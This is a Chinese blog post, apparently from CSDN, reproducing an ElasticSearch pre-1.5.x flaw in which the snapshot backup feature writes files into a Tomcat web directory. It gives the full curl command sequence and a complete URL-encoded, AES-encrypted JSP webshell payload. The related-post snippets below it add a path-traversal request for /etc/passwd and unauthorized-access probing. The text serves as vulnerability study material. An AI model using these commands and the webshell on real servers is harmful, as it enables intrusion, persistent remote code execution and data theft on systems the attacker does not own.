php目录穿越漏洞复现,ElasticSearch漏洞复现集合

最新推荐文章于 2023-04-19 09:26:04 发布
最新推荐文章于 2023-04-19 09:26:04 发布
阅读量1.1k 收藏
点赞数
文章标签: php目录穿越漏洞复现

原理ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项path.repo中,而且如果管理员不配置该选项,则默认不能使用该功能。即使管理员配置了该选项,web路径如果不在该目录下,也无法写入webshell。所以该漏洞影响的ElasticSearch版本是1.5.x以前。

影响版本1.5.x以前

复现访问环境

format,png开始写入webshell时,首先需要了解网站的绝对路径,创建一个恶意索引文档后,并在终端执行如下命令

curl -XPOST http://ip:9200/yz.jsp/yz.jsp/1 -d'{"":"test"}'

format,png再创建一个恶意的存储库,其中location的值即为将要写入的路径

curl -XPUT 'http://ip:9200/_snapshot/yz.jsp' -d '{"type": "fs","settings": {"location": "/usr/local/tomcat/webapps/wwwroot/","compress": false}}'

format,png存储库验证并创建:

curl -XPUT "http://ip:9200/_snapshot/yz.jsp/yz.jsp" -d '{"indices": "yz.jsp","ignore_unavailable": "true","include_global_state": false}'

format,png访问http://IP:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp,这就是我们写入的webshell

format,png该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串,参数为f,此处的shell要进行部分url编码,不然会连接不成功。http://192.168.187.136:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=%3c%25%40page+import%3d%22java.util.*%2cjavax.crypto.*%2cjavax.crypto.spec.*%22%25%3e%3c%25!class+U+extends+ClassLoader%7bU(ClassLoader+c)%7bsuper(c)%3b%7dpublic+Class+g(byte+%5b%5db)%7breturn+super.defineClass(b%2c0%2cb.length)%3b%7d%7d%25%3e%3c%25if(request.getParameter(%22pass%22)!%3dnull)%7bString+k%3d(%22%22%2bUUID.randomUUID()).replace(%22-%22%2c%22%22).substring(16)%3bsession.putValue(%22u%22%2ck)%3bout.print(k)%3breturn%3b%7dCipher+c%3dCipher.getInstance(%22AES%22)%3bc.init(2%2cnew+SecretKeySpec((session.getValue(%22u%22)%2b%22%22).getBytes()%2c%22AES%22))%3bnew+U(this.getClass().getClassLoader()).g(c.doFinal(new+sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3b%25%3e

format,png

bjackzjack
关注
web渗透测试漏洞复现Elasticsearch未授权漏洞复现
HACKONE的博客
03-18 2909
Elasticsearch 是一款 Java 编写的企业级搜索服务,它以分布式多用户能力和全文搜索引擎为特点,采用 RESTful web 接口。这款搜索引擎由 Java 开发,作为 Apache 许可下的开源软件发布,是流行的企业级搜索引擎之一。Elasticsearch 的增删改查操作都通过 http 接口完成。开源的版本可能存在未授权访问漏洞。这意味着攻击者可能获得 Elasticsearch 的所有权限,从而能够对数据进行任意操作。这可能导致业务系统中的敏感数据泄露、数据丢失、数据损坏。
漏洞复现ElasticSearch命令执行漏洞 (CVE-2014-3120)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 807
Elasticsearch 是一个基于 Lucene 库的搜索引擎,具有 HTTP Web 接口和无模式 JSON 文档。Elasticsearch 是用 Java 开发的,其支持 MVEL、js、Java 等语言,其老版本默认语言为 MVEL。MVEL -一个被众多 Java 项目使用的开源的表达式语言。Elasticsearch 1.2之前的版本默认配置启用了动态脚本,该脚本允许远程攻击者通过 _search 的 source 参数执行任意 MVEL 表达式和 Java 代码。...
php目录穿越漏洞攻击,WinRAR目录穿越漏洞
weixin_42522400的博客
03-24 438
漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行漏洞编号:CVE-2018-20250影响版本:WinRAR < 5.70 Beta 1Bandi...
php目录穿越漏洞攻击,GitLab任意文件读取漏洞CVE-2020-10977
weixin_35652131的博客
03-24 333
2020年4月28日,GitLab的一个任意文件读取漏洞漏洞细节被公开。该漏洞补丁于2020年3月26号由GitLab官方发布。相关组件介绍GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。漏洞分析当GitLab...
PHP代码审计 ----- 目录穿越
qq_62344745的博客
04-19 399
目录穿越(Directory Traversal)攻击是黑客能够在Web应用程序所在的根目录以外的文件夹上,任意地存取被限制的文件夹执行命令或查找数据。目录穿越攻击,也有人称为Path Traversal攻击。
php目录穿越漏洞,Spring MVC 目录穿越漏洞(CVE-2018-1271)分析
weixin_39622901的博客
04-12 430
原文出自:https://paper.seebug.org/665/漏洞影响Spring Framework 5.0 to 5.0.4.Spring Framework 4.3 to 4.3.14已不支持的旧版本仍然受影响漏洞利用条件Server运行于Windows系统上要使用file协议打开资源文件目录cleanPath的问题在于String[] pathArray = delimitedLis...
php目录穿越漏洞攻击,ImpressCMS跨站脚本执行和本地文件包含漏洞
weixin_42619448的博客
03-24 288
发布日期:2012-10-08更新日期:2012-10-09受影响系统:ImpressCMS ImpressCMS 1.3 Final描述:--------------------------------------------------------------------------------BUGTRAQ ID: 51268CVE ID: CVE-2012-0987ImpressCMS是...
vulhub漏洞复现十三_elasticsearch
weixin_44193247的博客
01-20 544
vulhub漏洞复现练习篇
Java防御目录穿越漏洞方法_Elasticsearch漏洞汇总
weixin_33467739的博客
03-01 1555
简介Elasticsearch是一个开源的分布式、RESTful 风格的搜索和数据分析引擎,它的底层是开源库Apache Lucene。Lucene 可以说是当下最先进、高性能、全功能的搜索引擎库——无论是开源还是私有,但它也仅仅只是一个库。为了充分发挥其功能,你需要使用 Java 并将 Lucene 直接集成到应用程序中。 更糟糕的是,您可能需要获得信息检索学位才能了解其工作原理,因为Lucen...
php目录穿越漏洞复现,关于Drupal目录穿越漏洞风险提示
weixin_39716105的博客
03-28 213
原标题:关于Drupal目录穿越漏洞风险提示漏洞简述时间:2021年01月22日程序详情:Drupal 是使用 PHP 语言编写的开源内容管理框架( CMF ),它由内容管理系统( CMS )和 PHP 开发框架( Framework )共同构成。pear,composer是 php 的插件管理/包管理系统,目前composer更为通用和流行。信息来源:01风险等级威胁等级:高影响范围:广泛02漏...
php目录遍历漏洞复现,nginx解析漏洞,配置不当,目录遍历漏洞环境搭建、漏洞复现...
weixin_42176612的博客
03-20 297
nginx解析漏洞,配置不当,目录遍历漏洞复现1.Ubuntu14.04安装nginx-php5-fpm安装了nginx,需要安装以下依赖sudo apt-get install libpcre3 libpcre3-devsudo apt-get install zlib1g.devsudo apt-get install libssl-dev安装php:apt-get install php5-...
php目录穿越权限,Nginx目录遍历(穿越漏洞
weixin_39676979的博客
03-19 485
之前的文章,记录了如何搭建一个docker环境。接下来,会使用这个docker环境做一些事情,算是个人学习的记录。首先确保docker已成功部署,环境准备好后,开始复现一个Nginx的漏洞。看到这里可能会很有疑惑,毕竟如果不知道Nginx与docker,或者相关漏洞的话接着看会很吃力。所以先期可以了解Nginx、docker相关背景与配置,这些可以通过搜索相关文章进行了解,其次需要有linux基础...
Elasticsearch漏洞汇总比较全
weixin_50464560的博客
08-23 5473
本测试环境同时运行了Tomcat和ElasticSearch,Tomcat目录在/usr/local/tomcat,web目录是/usr/local/tomcat/webapps;之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。我们的目标就是利用ElasticSearch,在/usr/local/tomcat/webapps目录下写入我们的webshell。
目录穿越
Flynn的博客
04-08 390
目录穿越
CVE-2021-41773目录遍历(文件穿越漏洞复现
qq_59826623的博客
10-11 1813
CVE-202141773目录遍历(文件穿越漏洞 Linux环境下 进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。 等待文件下载…… 安装完成后重启服务 访问本地的8080端口 打开Burpsuite,构造get参数 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 转换为post参数 修改命令为POST /cgi-bin/.%2e/%2e
web安全之目录穿越
weixin_54584489的博客
04-13 3562
目录穿越(又称目录遍历diretory traversal/path traversal)是通过目录控制序列 ../ 或者文件绝对路径来访问存储在文件系统上的任意文件和目录的一种漏洞
apktool的目录穿越漏洞
公众号shadow sock7
08-19 415
https://note.youdao.com/web/#/file/recent/note/1C4A29662BF34FB09FFE233597F0400D/
phpcms v9模版编辑路径穿越漏洞
收集盒 Book box
08-29 978
by flyh4t 通过如下方式可穿越目录编辑首页 index.php?m=template&c=file&a=edit_file&style=default&dir=wap/…././/…././/…././/…././/&file=index.html&pc_hash=YHgoqn admin.php?mod=phpcms&file=safe&action=see
Elasticsearch未授权访问漏洞复现
最新发布
05-18
Elasticsearch未授权访问漏洞是指攻击者可以通过访问Elasticsearch的默认端口(9200)获取敏感信息,甚至可以对数据进行修改和删除。下面是一个简单的复现过程: 1. 下载安装Elasticsearch 首先需要下载并安装Elasticsearch,可以从官网 https://www.elastic.co/downloads/elasticsearch 下载适合自己操作系统的版本。安装完成后启动Elasticsearch。 2. 测试未授权访问 使用curl命令访问Elasticsearch的默认端口,可以看到返回的json格式数据,其中包含了Elasticsearch的版本信息、集群名称等。 ``` curl http://localhost:9200/ ``` 如果返回的结果中包含了类似以下内容,说明Elasticsearch存在未授权访问漏洞。 ``` { "name" : "node-1", "cluster_name" : "elasticsearch", "cluster_uuid" : "zZl94mWlQq6RQlN4WmAz5w", "version" : { "number" : "7.9.3", "build_flavor" : "default", "build_type" : "tar", "build_hash" : "c4138e51121ef06a6404866cddc601906fe5c868", "build_date" : "2020-10-16T10:36:16.141335Z", "build_snapshot" : false, "lucene_version" : "8.6.2", "minimum_wire_compatibility_version" : "6.8.0", "minimum_index_compatibility_version" : "6.0.0-beta1" }, "tagline" : "You Know, for Search" } ``` 3. 利用未授权访问漏洞 利用未授权访问漏洞可以进行一些危害性较大的操作,比如删除数据、创建索引等。这里我们只演示一下获取敏感信息的操作。 使用curl命令访问Elasticsearch中的某个索引,可以看到其中包含了一些敏感信息,比如用户名、密码等。 ``` curl http://localhost:9200/_cat/indices ``` 如果返回的结果中包含了类似以下内容,说明存在敏感信息泄露。 ``` yellow open .kibana_task_manager_1 6rJQh5E8R0yUH9WdPQzLrw 1 1 3 0 35.4kb 35.4kb yellow open .kibana_1 5QZvZnS-QOyvZBTl2t6bKg 1 1 2 0 13.4kb 13.4kb ``` 4. 解决方法 为避免Elasticsearch的未授权访问漏洞,可以进行以下操作: - 修改配置文件中的network.host配置,限制Elasticsearch只能在特定的IP地址或网段上运行。 - 启用Elasticsearch的安全特性,比如启用访问控制、数据加密等。 以上是Elasticsearch未授权访问漏洞的简单复现过程,希望对您有帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值